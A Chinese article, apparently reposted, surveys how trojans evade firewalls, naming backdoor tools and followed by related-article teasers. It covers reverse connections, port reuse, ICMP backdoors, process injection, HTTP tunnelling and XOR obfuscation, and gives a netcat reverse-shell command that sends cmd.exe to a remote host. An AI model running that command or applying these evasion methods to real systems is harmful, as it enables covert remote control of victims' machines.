解析木马如何穿过你的防火墙?

  网络不太平,谁上网都会架起个firewall来防护网络攻击,这岂不是给我们木马的生存带来了巨大挑战?

  物竞天择,适者生存,嗯...要想生存下去就要穿墙! Bypass Firewall:

  1. 首先就是No Firewall(允许本地对外监听基本上任何端口),没有防火墙?(这不是废话?)

  对付这种机器好办,随便哪个马一般都行典型代表 Radmin(其实它不是马,用的人多了,也就变成了马,无辜)

  rdp 3389/tcp (远程桌面,它也不是马,不过你不用,还有谁用呢?)

  2. 端口筛选(只允许外部连接特定端口,也就是外部对特定端口发起syn连接请求才被接受,从而完成三次握手,建立连接,否则防火墙丢弃数据包,无法完成握手,无法建立连接,也就是木马不能随意开个端口就监听了)

  道高一尺,魔高一丈.:

  你不让我连你,我就让你连我呗, 反弹端口技术诞生了(一般防火墙对本地发起的syn连接请求不会拦截)

  使用工具netcat就可以穿刺这种防火墙 :

  nc -e cmd.exe 远程ip 远程监听port

  随后,端口复用技术也出现了,复用防火墙开放的端口:如80,21,445等

  典型的后门如hkdoor,ntrookit(作者都是国人yyt_hac )

  还有利用无端口协议来通信,如利用icmp报文,(Ping就是利用的ICMP协议的 Echo Request和Echo Reply探测主机存活)

  典型的如pingdoor (Ping由于使用icmp报文,根本不开放端口,端口筛选也就无可奈何了,但是icmp并无差错控制,所以这种后门的传输特性也并不理想,除非自己加上差错控制)

  更牛的,就是干脆抛开TCP/IP协议,木马自定义协议进行通信,你防火墙能把我怎么样?哈哈

  典型的如ntrootkit采用了自定义协议技术.

  3.应用程序筛选.(只允许特定程序访问网络)

  木马也不甘落后,自己不能访问网络,只好寄人篱下:

  进程插入技术诞生了,通常firewall都要允许iexplore.exe,explore.exe,svchost.exe,services.exe等程序访问网络,于是木马便盯上了这些程序.插入...插入再插入

  现在的远程控制一般都是插入进程式,一是隐蔽(没有自己进程),二是穿墙.典型如Bits.dll(替换系统服务BITS,插入svchost.exe中) 和灰鸽子/PcShare(默认插入iexplorer.exe浏览器进程)等.

  4.协议筛选.

  (例如,只允许80端口通过http协议,这样那些端口复用的后门没有使用http协议,不幸被防火墙拒之门外.:-)

  怎么办? 暗渡陈仓, 挖隧道: http-tunnel (http隧道)将木马通信封装成http数据报进行传输.

  使用这种技术的有pcshare(使用双向http隧道传输)

  5.IP过滤,一般就是化分为本机,局域网,广域网三个层次,不过木马也不是吃素的,有些木马已经开始智能化了:

  比如,无法连到黑客主机或者跳板,就搜索本机的代理设置,如IE代理设置,然后代理出去!

  可以想象P2P形式的马也将于不久以后成为可能,这样木马和僵尸网络的区别就更小了 呵呵

  6. 现在很多防火墙都可以检测传输的敏感信息,如用户口令等,所以抗IDS,抗自动分析,这便成了高级木马需要考虑的东西,换句话说保护黑客控制的安全性和隐秘性.典型的解决方法就是采取加密措施,如最简单的对付IDS检测的方法,xor异或加密.

  但是现在的防护墙肯定不是以上技术的分离,而是一定有多项技术同时采用.

  同时,综合利用以上对抗技术的木马也不鲜见了.

  木马和防护墙 永远是一对矛盾,彼此斗争,彼此发展.呵呵

时间: 2024-11-03 15:19:20

解析木马如何穿过你的防火墙?的相关文章

让木马不在兴风作浪:解析木马程序的藏身之处_网络冲浪

特洛伊木马往往是在你不注意的时候就进入到你的系统中兴风作浪,本文就介绍了一些他们经常藏身的地方.看完本文,那怕你不是高手你也能轻松的清除系统中的木马程序. 1.集成到程序中 其实木马也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了.绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动

ISA&TMG三种客户端模式简介(二) 防火墙客户端

在企业运维管理中,防火墙客户端是已安装并启用了防火墙客户端软件的计算机,位于受 ISA 服务器保护的网络中.安装防火墙客户端的方法可以分别在每台客户端计算机上安装防火墙客户端,或使用 Windows 软件安装管理单元集中管理防火墙客户端软件的分发. 防火墙客户端使用公用的 Winsock 提供程序.设置防火墙客户端时,并没有配置各个 Winsock 应用程序, 而是使防火墙客户端软件中的动态链接库 (FwcWsp.dll) 成为所有 Winsock 应用程序透明使用的 Winsock 分层服务提

企业级防火墙七问七答

企业级防火墙是目前金融.电信以及政府机构保护内部网络安全的首选产品,据统计三者所占的份额接近70%.但是,防火墙究竟是做什么的,能防范什么网络攻击行为,也许并不为大家所了解.现在让我们介绍一下防火墙的用途和功能: 1. 防火墙的保护对象究竟是谁,它是如何实现保护功能的? 从广义上讲,防火墙保护的是企业内部网络信息的安全,比如防止银行服务器用户账号信息.政府部门的保密信息.部队中的作战计划和战略等重要信息的泄漏.从狭义上讲,防火墙保护的是企业内部网络中各个电脑的安全,防止计算机受到来自企业外部非安

Windows Server 2008防火墙配置攻略

最新服务器操作系统Windows Server 2008已经发布,在这款微软所宣称的"史上安全性最强"的服务器操作系统中,新增了很多安全方面的设计和功能,其中它的防火墙也有了重大的改进,不过对于服务器操作系统来说,系统自带的普通防火墙显然功能过于简陋,我们今天介绍的是它的高级安全Windows防火墙,这是一款让Windows Server 2008的安全性大幅提高的一个利器. 了解高级安全Windows防火墙 在"深层防御"体系中,网络防火墙处于周边层,而Windo

win7系统如何设置开机自动启动防火墙

  防火墙是windows操作系统的一个安全功能,开启windows防火墙能够抵制病毒木马的传播感染,防火墙需要在电脑开机自动启动才能起到主动防御病毒的目的,那么在win7纯净版操作系统下该如何开启防火墙开机自动启动功能呢?一起来看看windows防火墙开机自动启动的设置教程吧. 自动启动防火墙方法/步骤: 1.win7 64位旗舰版下载后,鼠标右击系统下面的计算机图标,然后选择"管理"选项; 2.在弹出来的计算机管理界面里面,找到服务和应用程序选项,接着再点击服务项; 3.然后在窗口

服务器维护小常识(win+linux)

为了能更好的使用和延长服务器的使用寿命,定期的对服务器进行维护是非常必要的.但是,在维护服务器的时候一定要小心的处理好维护的工作,否则出现错误的话就会影响很大 为了方便大家在维护中了解一些维护内容的同时又能避免出现错误.下面就收集了一些服务器日常维护的常识供大家参考. 服务器日常维护常识之硬件维护 服务器日常维护常识硬件维护1.储存设备的扩充 当资源不断扩展的时候,服务器就需要更多的内存和硬盘容量来储存这些资源.所以,内存和硬盘的扩充是很常见的.增加内存前需要认定与服务器原有的内存的兼容性,最好

服务器日常维护常识(win+linux)

为了方便大家在维护中了解一些维护内容的同时又能避免出现错误.下面就收集了一些服务器日常维护的常识供大家参考. 服务器日常维护常识之硬件维护 服务器日常维护常识硬件维护1.储存设备的扩充 当资源不断扩展的时候,服务器就需要更多的内存和硬盘容量来储存这些资源.所以,内存和硬盘的扩充是很常见的.增加内存前需要认定与服务器原有的内存的兼容性,最好是同一品牌的规格的内存.如果是服务器专用的ECC内存,则必须选用相同的内存,普通的SDRAM内存与ECC内存在同一台服务器上使用很可能会引起统严重出错.在增加硬

服务器维护小常识(win+linux)_win服务器

为了方便大家在维护中了解一些维护内容的同时又能避免出现错误.下面就收集了一些服务器日常维护的常识供大家参考. 服务器日常维护常识之硬件维护 服务器日常维护常识硬件维护1.储存设备的扩充 当资源不断扩展的时候,服务器就需要更多的内存和硬盘容量来储存这些资源.所以,内存和硬盘的扩充是很常见的.增加内存前需要认定与服务器原有的内存的兼容性,最好是同一品牌的规格的内存.如果是服务器专用的ECC内存,则必须选用相同的内存,普通的SDRAM内存与ECC内存在同一台服务器上使用很可能会引起统严重出错.在增加硬

CnBeta暂时被Google封了

今天使用Google搜索的时候,发现CnBeta的网站内容全部都被加上"该网站可能含有恶意软件,有可能会危害您的电脑."的字样,点击进去后提示"警告- 访问该网站可能会损害您的计算机",可以说直接从Google进入CnBeta的可能性几乎没有了. 后来了解到一些情况,好像CnBeta所在的机房有ARP攻击,CnBeta正好中招,于是被Google判定网站挂木马,暂时屏蔽了. 遇到这种提示信息后,网站的管理员应该第一时间清除网站内的木马,或者安装ARP防火墙,同时登录